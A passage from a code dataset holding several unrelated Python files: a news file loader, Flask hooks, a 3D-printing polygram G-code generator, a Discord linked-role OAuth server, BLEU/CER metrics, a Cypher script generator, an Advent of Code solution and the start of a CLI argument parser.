)\n","repo_name":"joshtummala/workout_recommendations","sub_path":"recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24494653803","text":"import datetime\nimport sys\nimport os\nimport json\nimport re\nimport xml.etree.ElementTree as Et\n\ndate = datetime.datetime\n\n\nclass Choose:\n def __init__(self):\n self.input_type = input(\"\"\"Choose input type:\n 1 - Input\n 2 - Load from file\n 3 - Exit\n \"\"\")\n if self.input_type == '1':\n self.type_of_publication = input(f\"\"\"Choose type of news or exit, please (Enter digit):\n 1 - News\n 2 - Private Ad\n 3 - Hello_message\n 4 - Exit\n \"\"\")\n elif self.input_type == '2':\n self.folder_choose = input(f\"\"\"Folder for file:\n 1 - Default Folder\n 2 - User folder\n \"\"\")\n self.file_type = input(\"\"\"Choose type of file:\n 1 - TXT\n 2 - JSON\n 3 - XML\n \"\"\")\n self.count_of_publications = int(input('Input count of publ from file '))\n if self.folder_choose == '1':\n self.file_path = sys.path[1]\n elif self.folder_choose == '2':\n self.file_path = input(r\"Enter path to file (in format C:\\) \")\n self.source_file_name = input('Enter your file name\\n')\n self.source_file_path = os.path.join(self.file_path, self.source_file_name)\n elif self.input_type == '3':\n sys.exit()\n\n self.content = ''\n\n def read_from_txt_file(self):\n self.source_file = open(self.source_file_path, 'r').read()\n self.text_from_file = re.split(\"\\\\n\\\\n\", self.source_file)\n return self.text_from_file\n\n def write_from_txt_file(self, target_of_writing=\"News.txt\"):\n with open(target_of_writing, \"a\") as file:\n if self.count_of_publications > 0:\n for word in self.text_from_file:\n if self.text_from_file.index(word) < self.count_of_publications:\n file.write(word + '\\n\\n')\n os.remove(self.source_file_path)\n\n\n def read_from_xml_file(self):\n xml_file = Et.parse(self.source_file_path)\n self.root = xml_file.getroot()\n return self.root\n\n def write_from_xml(self, target_of_writing=\"News.txt\"):\n for index, elem in enumerate(self.root.findall('publication')):\n if index >= self.count_of_publications:\n break\n else:\n for publication in elem:\n if publication.text.lower() == 'news':\n self.content = f\"News------------------\\n{publication.attrib['text'].capitalize()}\\n\" \\\n f\"{publication.attrib['city'].capitalize()}, \" \\\n f\"{date.now().strftime('%d/%m/%Y %I.%M')}\\n\\n\"\n\n elif publication.text.lower() == 'ad':\n actual_date = date.strptime(publication.attrib['actual_date'], '%d/%m/%Y')\n ads_actual_date = actual_date.strftime('%d/%m/%Y')\n days_until = (actual_date.date() - date.now().date()).days\n self.content = f\"Private Ad------------\\n{publication.attrib['text'].capitalize()}\\n\" \\\n f\"Actual until: {ads_actual_date}, {days_until} days left\\n\\n\"\n\n elif publication.text.lower() == 'hello':\n self.content = f\"Hello message---------\\nFrom {publication.attrib['user_name'].capitalize()}\" \\\n f\" TO {publication.attrib['receiver_name'].capitalize()}\\n\" \\\n f\"{publication.attrib['text'].capitalize()}\\n\\n\"\n with open(target_of_writing, \"a\") as file:\n file.write(self.content)\n os.remove(self.source_file_path)\n\n def read_from_json_file(self):\n self.list_of_dict_from_json = json.load(open(self.source_file_path))\n return self.list_of_dict_from_json\n\n def write_from_json_file(self, target_of_writing=\"News.txt\"):\n for index, dictionary in enumerate(self.list_of_dict_from_json):\n if index < self.count_of_publications:\n for key, value in dictionary.items():\n if key == 'type' and value.lower() == 'news':\n self.content = f\"News------------------\\n{dictionary['text'].capitalize()}\\n\" \\\n f\"{dictionary['city'].capitalize()}, {date.now().strftime('%d/%m/%Y %I.%M')}\\n\\n\"\n elif key == 'type' and value.lower() == 'ad':\n actual_date = date.strptime(dictionary['actual_date'], '%d/%m/%Y')\n ads_actual_date = actual_date.strftime('%d/%m/%Y')\n days_until = (actual_date.date() - date.now().date()).days\n self.content = f\"Private Ad------------\\n{dictionary['text'].capitalize()}\\nActual until:\" \\\n f\"{ads_actual_date}, {days_until} days left\\n\\n\"\n elif key == 'type' and value.lower() == 'hello':\n self.content = f\"Hello message---------\\nFrom {dictionary['user_name'].capitalize()} TO \" \\\n f\"{dictionary['receiver_name'].capitalize()}\\n\" \\\n f\"{dictionary['text'].capitalize()}\\n\\n\"\n with open(target_of_writing, \"a\") as file:\n file.write(self.content)\n break\n else:\n break\n os.remove(self.source_file_path)\n","repo_name":"ArtsemNikulin/DQE_PY","sub_path":"choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70981860571","text":"from .views import bp\nimport config\nfrom flask import session,g\nfrom .models import CMSUser,CMSPermission\n\n@bp.before_request\ndef before_request():\n if config.CMS_USER_ID in session:\n user_id = session.get(config.CMS_USER_ID)\n user = CMSUser.query.get(user_id)\n if user:\n g.cms_user = user\n\n@bp.context_processor\ndef cms_context_pocessor():\n return {'CMSPermission':CMSPermission}","repo_name":"derek-zhang123/BBS","sub_path":"apps/cms/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"32"} +{"seq_id":"45106412962","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom GCodeGenerator import GCodeGenerator\nfrom GCodeGenerator import dTheta\nfrom GCodeGenerator import dLength\n\n\n# Solve slope (m) and intercept(d) given two points (x1, y1) , (x2, y2)\n# y = mx + d\n# |y1| = | x1 1 | | m |\n# |y2| | x2 1 | | d |\n# a = np.array([x1, 1] , [x2,1]) b = [y1, y2] , c = [m,d]\ndef SolveLine( x1, y1, x2, y2 ) :\n a = np.array( [[ x1, 1.] , [ x2, 1.]] )\n b = np.array( [y1, y2 ] )\n c = np.linalg.solve(a,b)\n\n return c\n\n\n\nclass Polygrams:\n\n # number of legs/sides\n n = 5\n # inner radius of the ploygon\n r = 10\n # inner angle\n delta = -1.*math.pi / 2\n theta = 2.*math.pi / n\n\n # points on the circle\n x = []\n y = []\n # slope and intercept for the side lines : y = mx+ d\n m = []\n d = []\n # position of resolved tip\n xt = []\n yt = []\n # Routing path\n u=[]\n v=[]\n\n # Tip speace (ts) and Bead height (bh) and first layer adjustment (fh)\n bh = 0.5\n ts = 0.35\n fh = 0.1\n\n # Linear density ( or Flow rate )\n rho = 0.75\n Fval = 6000.\n Eval = Fval*rho\n\n # objType = 0 ; polygon , objType = 1 : polygram\n def __init__(self, n_ = 5 , r_ = 10, objType = 0 ):\n self.n = int(n_)\n self.r = float(r_)\n self.objType = objType\n self.delta = -1.*math.pi / 2\n self.theta = 2.*math.pi / self.n\n self.Eval = self.rho * self.Fval\n self.gFval1 = self.Fval\n self.gFval2 = self.Fval\n self.x0 = 0\n self.y0 = 0\n # retraction distance and retraaction Eval\n self.rth = 2\n self.rEval = -1\n\n def setCenter(self, x0, y0):\n\n self.x0 = x0\n self.y0 = y0\n\n def setGeometry(self, r1, r2, n , delta_ , objectType ):\n\n self.n = int( n )\n self.r1 = r1\n self.r2 = r2\n self.objType = objectType\n self.delta = delta_\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n\n def setPrintable(self, Fval_, rho_, bh_, ts_, fh_, bw_, nlayer_ ):\n\n self.Fval = Fval_\n self.rho = rho_\n self.Eval = self.rho * self.Fval\n self.bh = bh_\n self.ts = ts_\n self.fh = fh_\n self.bw = bw_\n self.nLayer = int( nlayer_ )\n #self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n\n def setRetraction(self, rth, rEval ):\n\n self.rth = rth\n self.rEval = rEval\n\n def SetParameters(self, n_ , r_ , delta_ = -1.*math.pi /2 ):\n self.n = int(n_)\n self.r = float(r_)\n self.delta = delta_\n self.theta = 2.*math.pi / self.n\n self.x = []\n self.y = []\n self.m = []\n self.d = []\n self.xt = []\n self.yt = []\n self.u = []\n self.v = []\n\n # points on the circle\n def GetPolygon(self):\n # Compute n points of polygon\n for i in range( self.n ):\n self.x.append( self.r*math.cos(self.theta*i + self.delta) + self.x0 )\n self.y.append( self.r*math.sin(self.theta*i + self.delta) + self.y0 )\n #print( ' (%d) Angle = %.3f , x =%.3f y =%.3f ' %( i, math.degrees(self.theta*i), self.x[i], self.y[i] ) )\n\n if self.objType == 0 :\n self.x.append( self.x[0] )\n self.y.append( self.y[0] )\n\n def GetPolygonA(self, nside, iniA, endA, xc, yc, R ):\n\n dPhi = 0\n arcV = []\n if endA > iniA :\n dPhi = (endA - iniA) / nside\n else :\n dPhi = (2*math.pi - (iniA - endA )) / nside\n\n for i in range( nside ) :\n Phi = iniA + (i*dPhi)\n x = R*math.cos( Phi ) + xc\n y = R*math.sin( Phi ) + yc\n arcV.append( [x,y] )\n\n return arcV\n\n def GetPolygonB(self, nside, iniPos, endPos, xc, yc ):\n\n # Getting initial radius ri and ending radius rj\n # Initial/ending angle in the range of 0 ~ 2pi\n ri = math.sqrt( ((xc - iniPos[0] )*(xc-iniPos[0])) + ((yc - iniPos[1] )*(yc-iniPos[1])) )\n rj = math.sqrt( ((xc - endPos[0] )*(xc-endPos[0])) + ((yc - endPos[1] )*(yc-endPos[1])) )\n iniA = math.acos( (iniPos[0]-xc )/ri )\n endA = math.acos( (endPos[0]-xc )/rj )\n if iniPos[1] < yc :\n iniA = (math.pi*2) - iniA\n if endPos[1] < yc :\n endA = (math.pi*2) - endA\n\n\n R = ri\n #dR = (rj - ri) / nside\n dR = 0\n dPhi = 0\n arcV = []\n if endA > iniA :\n dPhi = (endA - iniA) / nside\n else :\n dPhi = (2*math.pi - (iniA - endA )) / nside\n\n for i in range( nside ) :\n Phi = iniA + (i*dPhi)\n x = R*math.cos( Phi ) + xc\n y = R*math.sin( Phi ) + yc\n arcV.append( [x,y] )\n R = R + dR\n\n return arcV\n\n\n # Solve n side of the polygon : y = mx + d\n # solve m and d given (x1, y1) , (x2, y2)\n # |y1| = | x1 1 | | m |\n # |y2| | x2 1 | | d |\n # a = np.array([x1, 1] , [x2,1]) b = [y1, y2] , c = [m,d]\n def GetLine(self):\n\n for i in range( self.n ):\n j = i+1\n if i == self.n-1 :\n j = 0\n\n a = np.array( [[self.x[i], 1.] , [self.x[j],1.]] )\n b = np.array( [ self.y[i], self.y[j] ] )\n c = np.linalg.solve(a,b)\n #print(' [%.3f , %.3f] = [ %.3f , %.3f ] [ %.3f, %.3f ] ' %( self.y[i], self.y[j], self.x[i], self.x[j], c[0], c[1] ) )\n self.m.append( c[0] )\n self.d.append( c[1] )\n\n\n # Solve n tips of the polygram from the polygon\n def GetPolygram(self):\n\n for i in range(self.n):\n j = i+2\n if j > self.n-1:\n j = j - self.n\n\n a = np.array( [[self.m[i], -1.] , [self.m[j],-1.]] )\n b = np.array( [ -1*self.d[i], -1*self.d[j] ] )\n c = np.linalg.solve(a,b)\n self.xt.append( c[0] )\n self.yt.append( c[1] )\n #print( '(%d,%d) = [ %.3f, %.3f ]' %( i, j, c[0], c[1]) )\n self.u.append( c[0] + self.x0)\n self.v.append( c[1] + self.y0)\n self.u.append( self.x[j] + self.x0)\n self.v.append( self.y[j] + self.y0)\n\n # Return to starting point\n self.u.append(self.xt[0])\n self.v.append(self.yt[0])\n\n def Create(self, n_, r_, delta_ = -1.*math.pi /2 ):\n print( ' Create %d-side Polygram with radius %.2f' %( n_ , r_) )\n self.SetParameters( n_, r_, delta_ )\n self.GetPolygon()\n if self.objType == 1 :\n self.GetLine()\n self.GetPolygram()\n\n def SetGlideSpeed(self, fVal_1, fVal_2 ):\n self.gFval1 = fVal_1\n self.gFval2 = fVal_2\n\n\n # status is given by the way(G0 or G1 or retract) to the point\n # rS status -> 1 : print , 0: move only , 2: retract,\n # This function is only used after Create\n def GetPolygramResult(self, rS = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n eVal = 0\n for i in range( len(self.u) ):\n\n if i == 0:\n eVal = -1.\n\n # Adding retraction\n if len(rx) > 0 and retract :\n rx.append( rx[ len(rx) -1 ] )\n ry.append( ry[ len(ry) -1 ] )\n rz.append( zVal + 2 )\n rE.append( eVal )\n rS.append( 2 )\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal + self.rth )\n rE.append( self.rEval )\n rS.append( 0 )\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( -2 )\n else :\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( 0 )\n\n else :\n dx = self.u[i] - self.u[i-1]\n dy = self.v[i] - self.v[i-1]\n dl = math.sqrt( (dx*dx) + (dy*dy) )\n dt = dl / self.Fval\n eVal = self.Eval * dt\n\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( eVal )\n rS.append( 1 )\n\n def GetPolygonResult(self, rS = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n eVal = 0\n for i in range( len(self.x) ):\n\n if i == 0:\n eVal = -1.\n\n if len(rx) > 0 and retract :\n rx.append( rx[ len(rx) -1 ] )\n ry.append( ry[ len(ry) -1 ] )\n rz.append( zVal + 2 )\n rE.append( eVal )\n rS.append( 2 )\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal + self.rth )\n rE.append( self.rEval )\n rS.append( 0 )\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( -2 )\n else :\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( 0 )\n\n else :\n\n dx = self.x[i] - self.x[i-1]\n dy = self.y[i] - self.y[i-1]\n dl = math.sqrt( (dx*dx) + (dy*dy) )\n dt = dl / self.Fval\n eVal = self.Eval * dt\n\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( eVal )\n rS.append( 1 )\n\n def GetResult(self, rs = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n if self.objType == 0 :\n print('Get Result Type 0')\n self.GetPolygonResult( rs, rx, ry, rz, zVal, rE, retract )\n elif self.objType == 1 :\n print('Get Result Type 1')\n self.GetPolygramResult( rs, rx, ry, rz, zVal, rE, retract )\n else :\n print('Get Result Type 2')\n self.GetPolygramResult( rs, rx, ry, rz, zVal, rE, retract )\n\n\n def Configure(self):\n\n self.objType = input('Polygon (0) or Polygram(1) : ')\n if self.objType == '': self.objType = 1\n else : self.objType = int(self.objType)\n\n self.n = input('Number of Sides (5): ')\n if self.n == '': self.n = 5\n else : self.n = int(self.n)\n self.r1 = input('1st Radius (18): ')\n if self.r1 == '': self.r1 = 18\n else : self.r1 = float( self.r1)\n self.r2 = input('2nd Radius (10): ')\n if self.r2 == '': self.r2 = 10\n else : self.r2 = float( self.r2)\n self.bw = input('Bead width (0.75): ')\n if self.bw == '': self.bw = 0.75\n else : self.bw = float(self.bw)\n self.nLayer = input('Number of Layer (1): ')\n if self.nLayer == '': self.nLayer = 1\n else : self.nLayer = int( self.nLayer )\n self.delta = input(' Delta angle :')\n if self.delta == '' : self.delta = -1*math.pi/2\n else : self.delta = float( self.delta )\n self.rho = input(' Flow Rate (0.75) :')\n if self.rho == '' : self.rho = 0.75\n else : self.rho = float( self.rho )\n self.Fval = input(' Stage Velocity (6000) :')\n if self.Fval == '' : self.Fval = 6000\n else : self.Fval = float( self.Fval )\n\n self.Eval = self.rho * self.Fval\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n print(\" FlowRate %.3f Speed %.3f Extrude %.3f \" %(self.rho, self.Fval, self.Eval ))\n\n def Construct2D(self, zVal, rS=[], rx =[], ry= [], rz =[], rE = [], retract = True ):\n\n # Rotation angle\n dtheta = 2*math.pi/ self.n\n\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n # Inside-out or outside-in\n dr = self.bw\n r = self.r1 + (self.bw/2)\n if (self.r1 - self.r2) > 0 :\n r = self.r1 - (self.bw/2)\n dr = -1*self.bw\n\n da_ = self.delta\n for i in range( self.nStep ):\n #print( ' == r = %.3f == \\n' %(r))\n self.Create( self.n, r , da_ )\n #self.GetResult(rs, rx, ry)\n self.GetResult(rS, rx, ry, rz, zVal, rE, retract )\n r = r+ dr\n da_ = da_ + dtheta\n\n def Construct3D(self, rS=[], rx =[], ry= [], rz =[], rE = [] ):\n\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n # Rotation angle\n dtheta = 2*math.pi/ self.n\n\n # Inside-out or outside-in\n dr = self.bw\n r = self.r1 + (self.bw/2)\n if (self.r1 - self.r2) > 0 :\n r = self.r1 - (self.bw/2)\n dr = -1*self.bw\n r0 = r\n #stagger = 0.5*self.bw\n stagger = 0\n\n # Z level\n zVal = self.bh + self.ts + self.fh\n\n # Starting angle\n da_ = self.delta\n for i in range( self.nLayer ):\n print(' Print Level %d' %(i))\n if dr > 0 and i%2 == 1 :\n r = r0 + stagger\n elif dr < 0 and i%2 == 1 :\n r = r0 - stagger\n else :\n r = r0\n\n for j in range( self.nStep ):\n print( ' == r = %.3f == \\n' %(r))\n if j == 0 :\n retract = True\n else :\n retract = False\n self.Create( self.n, r , da_ )\n self.GetResult(rS, rx, ry, rz, zVal, rE, retract )\n r = r+ dr\n\n\n da_ = da_ + dtheta\n zVal = zVal + self.bh\n\n def AddSkirt(self,rs = [], rx = [] , ry = [] , rz = [], rE = [] ) :\n\n rSkirt = max([self.r1, self.r2]) + 10\n print( ' == Printing Skirt %.3f==' %(rSkirt))\n\n # Starting angle\n da_ = self.delta\n # initial Z position\n zVal = self.bh + self.ts + self.fh\n\n self.Create( self.n, rSkirt, da_ )\n self.GetResult(rs, rx, ry, rz, zVal, rE )\n\n'''\n\npolyObj = Polygrams()\npolyObj.Configure()\nrs = []\nrx = []\nry = []\nrz = []\nrE = []\n\n\n#polyObj.Construct2D(rs, rx, ry)\npolyObj.AddSkirt(rs, rx, ry, rz, rE )\npolyObj.Construct3D(rs, rx, ry, rz, rE )\n#polyObj.SetGlideSpeed(1000,1000)\n#polyObj.Gliding( 0.06, 0.1 , 0.06, 0.1, rs, rx, ry, rz, rE)\n\n# Output GCode\ngc = GCodeGenerator( rs, rx, ry, rz, rE, polyObj.Fval )\n#gc.SetGlideSpeed( polyObj.gFval1, polyObj.gFval2 )\ngc.SetGlideSpeed( 2000, 3000 )\ngc.Gliding( 0.06, 0.1 , 0.06, 0.1, rs, rx, ry, rz, rE )\n\ngc.Shift( 150, 150, 0 )\ngc.Generate()\n\n# setup cavas\nfig = plt.figure( figsize=(7.5,7.5) )\nfig.suptitle( 'Polygram', fontsize=10, fontweight='bold')\n\n# one sub plot (x,y,index)\nax = fig.add_subplot(111)\nax.set_xlabel('x')\nax.set_ylabel('y')\n\n# Plot XY limit and grid\nplt.xlim([-55, 55])\nplt.ylim([-55, 55])\nplt.grid(b=True, which='major')\nax.scatter( polyObj.x, polyObj.y, s=50, marker= 'o', facecolors='none', edgecolors='red' )\n#ax.scatter( polyObj.xt, polyObj.yt, s=50, marker= '^', facecolors='none', edgecolors='blue' )\n\n# Start Routing (x,y) -> (xt,yt) -> (x,y)\nprint( ' total point %d ' %( len(rx)) )\nx_ = rx[0]\ny_ = ry[0]\nnPoint = len( rx )\nn = polyObj.n\nfor i in range( nPoint -1 ) :\n dX = rx[i+1] - x_\n dY = ry[i+1] - y_\n # print(\" i= \" + str(i) + \"( \" + str( i[0]) + \", \" + str(i[1]) + \")\" )\n if i == 0 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='green', picker=5)\n #elif (i%(n*2+1) ) == (n*2):\n elif rs[i+1] == 0:\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='red', picker=5)\n elif rs[i+1] == 1 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='purple', picker=5)\n elif rs[i+1] == 3 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='blue', picker=5)\n elif rs[i+1] == 4 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='black', picker=5)\n else :\n continue\n\n x_ = rx[i+1]\n y_ = ry[i+1]\n\nplt.show()\n'''\n\n\n\n","repo_name":"sckao/MyGCodeReader","sub_path":"Polygram.py","file_name":"Polygram.py","file_ext":"py","file_size_in_byte":16364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42369741461","text":"import discord_api\nfrom quart import Quart, redirect, request, render_template\nfrom discord.ext.ipc import Client\nimport aiohttp\nimport os\nimport uvicorn\nimport logging\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = Quart(__name__)\nipc = Client(host = \"bot\", secret_key=os.getenv(\"IPC_SECRET\"))\n\n@app.errorhandler(500)\nasync def bad(error):\n return error\n\n@app.before_serving\nasync def create_client_session():\n app.aiohttp_session = aiohttp.ClientSession(raise_for_status=True)\n \n@app.after_serving\nasync def close_client_session():\n await app.aiohttp_session.close()\n\n@app.get(\"/\")\nasync def root():\n return redirect(\"https://discord.gg/tradecentral\")\n\n@app.get(\"/linked-role\")\nasync def linked_role():\n state, url = await discord_api.get_oauth_url()\n response = redirect(url)\n response.set_cookie('clientState', str(state))\n return response\n\n\n@app.get(\"/discord-oauth-callback\")\nasync def oauth():\n code = request.args.get('code')\n discord_state = request.args.get('state')\n client_state = request.cookies.get(\"clientState\")\n \n if code is None or discord_state is None:\n return await render_template('fails.html', message='You should not be here!')\n if discord_state != client_state:\n return await render_template('fails.html', message='Unauthorized')\n\n try:\n tokens = await discord_api.get_oauth_tokens(session=app.aiohttp_session, code=code)\n data_me = await discord_api.get_user_data(session=app.aiohttp_session, tokens=tokens)\n connections = await discord_api.get_user_connections(session=app.aiohttp_session, tokens=tokens)\n guilds = await discord_api.get_user_guilds(session=app.aiohttp_session, tokens=tokens)\n except discord_api.DiscordAuthException:\n return await render_template('fails.html', message='Could not authorize with discord')\n except discord_api.DiscordAPIError:\n return await render_template('fails.html', message='Error while querying discord api\"')\n except discord_api.HTTPException:\n return await render_template('fails.html', message=f'Error while querying discord api')\n\n response = await ipc.request(\n \"resolve_metadata\", \n user_data=data_me, \n connections=connections,\n guilds=guilds,\n user_agent=request.headers.get('User-Agent', \"None\"), \n remote_addr=request.headers.get(\"X-Forwarded-For\")\n )\n \n data = response.response\n\n if data is None:\n logging.error(f\"Could not resolve metadata for {data_me['user']['id']}\")\n return await render_template('fails.html', message='Could not resolve metadata')\n\n exception = data.get('exception', None)\n member = data.get('member', None)\n user = data.get('user', None)\n metadata = data.get('metadata', None)\n\n if not user:\n logging.error(f\"User not found for {data_me['user']['id']}\")\n return await render_template('fails.html', message='User not found.')\n if str(user['id']) != str(data_me['user']['id']):\n logging.error(f\"User ID mismatch: {user['id']} != {data_me['user']['id']}\")\n return await render_template('fails.html', message='User ID mismatch. Please try again or contact support.')\n if not member:\n logging.error(f\"Member not found for {data_me['user']['id']}\")\n return await render_template('fails.html', message='You need to join Trade Central first.')\n if exception:\n logging.error(f\"Exception while resolving metadata for {data_me['user']['id']}: {exception}\")\n return await render_template(\n 'fails.html', message=f'Your account is not eligible for verification for the following reason: {exception}')\n if not metadata:\n logging.error(f\"Metadata not found for {data_me['user']['id']}\")\n return await render_template('fails.html', message='Metadata not found.')\n\n try:\n logging.info(f\"Pushing metadata for {user['id']}: {metadata}\")\n await discord_api.push_metadata(session=app.aiohttp_session, tokens=tokens, metadata=metadata)\n except exception as e:\n logging.error(f\"Exception while pushing metadata for {user['id']}: {e}\")\n return await render_template('fails.html', message='Exception while pushing metadata')\n \n return await render_template('success.html', name='Success')\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"app:app\", host=\"localhost\", port=5005, log_level=\"info\")","repo_name":"ippess/role-verification-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7836374099","text":"from Levenshtein import distance\nfrom nltk import ngrams\nfrom collections import Counter\n\ndef cer(predicted,actual):\n return distance(predicted,actual)\n\ndef create_ngram_map(text,n=4):\n ngram_list=[]\n for i in range(n):\n ngram_list=ngram_list+[ng for ng in ngrams(text,i)]\n return Counter(ngram_list)\n \n\ndef bleu(predicted,actual,order=4):\n bleu_prod=1\n for i in range(order):\n pred_ngram_map=create_ngram_map(predicted,i+1)\n act_ngram_map=create_ngram_map(actual,i+1)\n bleu_sum=0\n ngsize=len(act_ngram_map)\n for word,count in act_ngram_map.items():\n if pred_ngram_map.get(word):\n bleu_sum=bleu_sum+min(pred_ngram_map[word],count)\n bleu_prod=bleu_prod*(bleu_sum/ngsize)\n return bleu_prod**(1/order)\n\n\n\n \n \n\n\n\n\n\n\n \n\n \n","repo_name":"multimedia-lab/English2HindiTransliteration","sub_path":"Codebase/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37202641512","text":"import json\nimport os\n\n\ndef run():\n path = os.path.join(os.getcwd(), 'data', 'schema.json')\n with open(path, 'r') as fr:\n schema = json.load(fr)\n\n cmd_list = list()\n for table, attr in schema.items():\n s = ''\n for n, i in enumerate(attr):\n s += '%s:line[%d]' % (i, n)\n if n < len(attr) - 1:\n s += ', '\n cmd_1 = \"LOAD CSV FROM 'file:///%s.csv' AS line\\n\" % table\n cmd_list.append(cmd_1)\n cmd_2 = \"MERGE (:%s {%s});\\n\" % (table, s)\n cmd_list.append(cmd_2)\n\n print(len(cmd_list))\n out_path = os.path.join(os.getcwd(), 'cypher', 'load.cypher')\n with open(out_path, 'w') as fw:\n fw.writelines(cmd_list)\n\n\nif __name__ == '__main__':\n run()\n\n# type cypher\\load.cypher | cypher-shell.bat -u neo4j -p 1234\n","repo_name":"xzk-seu/360KG","sub_path":"cypher_cmd_gen.py","file_name":"cypher_cmd_gen.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19643822435","text":"import sys\nsys.path.append(\"../\")\nfrom filified import *\n\nops = file_to_arr(\"input.txt\",lambda x: x.strip())\n\n\ndef render_screen(screen):\n for idx in range(1,len(screen)):\n print(screen[idx],end=\"\")\n if idx % 40 == 0:\n print(\"\")\n \n\nscreen = [\".\"] * 241\n\n\n\nx = 1\ncycle = 1\nla_somme = 0\nwanted = [20,60,100,140,180,220]\nfor idx , op in enumerate(ops):\n print(cycle)\n if op.find(\"noop\") != -1:\n if x <= cycle % 40 <= x+2:\n screen[cycle] = \"#\"\n cycle += 1\n else:\n for _ in range(2):\n if x <= cycle % 40 <= x+2:\n screen[cycle] = \"#\"\n cycle += 1\n x += int(op.split(\" \")[1])\n\n\nrender_screen(screen)\nprint()\n\n","repo_name":"t-88/advent-of-coding","sub_path":"2022/day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20714676559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#---[Name & Dates]----------------------------------------------------------#\n# Filename ~ args.py [Created: 2023-03-21 | 10:26 - AM] #\n# [Updated: 2023-04-10 | 13:18 - PM] #\n#---[Info]------------------------------------------------------------------#\n# All arguments of the 'gitpy' command #\n# Language ~ Python3 #\n#---[Authors]---------------------------------------------------------------#\n# Thomas Pellissier (MyMeepSQL) #\n# Jonas Petitpierre (Bashy) #\n#---[Operating System]------------------------------------------------------#\n# Developed for Linux #\n#---[License]---------------------------------------------------------------#\n# GNU General Public License v3.0 #\n# ------------------------------- #\n# #\n# This program is free software; you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation; either version 2 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License along #\n# with this program; if not, write to the Free Software Foundation, Inc., #\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. #\n#---------------------------------------------------------------------------#\n\n# Import section\nimport sys\nfrom gettext import gettext as _\n\n## Third party libraries\nimport src.tools.argparse as argparse\nfrom src.config import Configuration\nfrom src.util.colors import Color\n\n# Custom help formatter (not in use because to the custom help message in the 'help_messages.py' file)\nclass BetterHelpFormatter(argparse.HelpFormatter):\n def add_usage(self, usage, actions, groups, prefix=None):\n if prefix is None:\n prefix = Color.s('{SB2}{bold}Usage{W}: ')\n\n return super(BetterHelpFormatter , self).add_usage(usage, actions, groups, prefix)\n \n def _fill_text(self, text, width, indent):\n return ''.join(indent + line for line in text.splitlines(keepends=True))\n\n# Main\nclass Arguments(argparse.ArgumentParser):\n '''\n All arguments of the 'gitpy' command\n '''\n\n @classmethod\n def get_arguments(cls):\n '''\n Returns parser.args() containing all program arguments\n '''\n\n \"\"\"\n Keyword Arguments:\n\n - option_strings -- A list of command-line option strings which\n should be associated with this action.\n\n - dest -- The name of the attribute to hold the created object(s)\n\n - nargs -- The number of command-line arguments that should be\n consumed. By default, one argument will be consumed and a single\n value will be produced. Other values include:\n - N (an integer) consumes N arguments (and produces a list)\n - '?' consumes zero or one arguments\n - '*' consumes zero or more arguments (and produces a list)\n - '+' consumes one or more arguments (and produces a list)\n Note that the difference between the default and nargs=1 is that\n with the default, a single value will be produced, while with\n nargs=1, a list containing a single value will be produced.\n\n - const -- The value to be produced if the option is specified and the\n option uses an action that takes no values.\n\n - default -- The value to be produced if the option is not specified.\n\n - type -- A 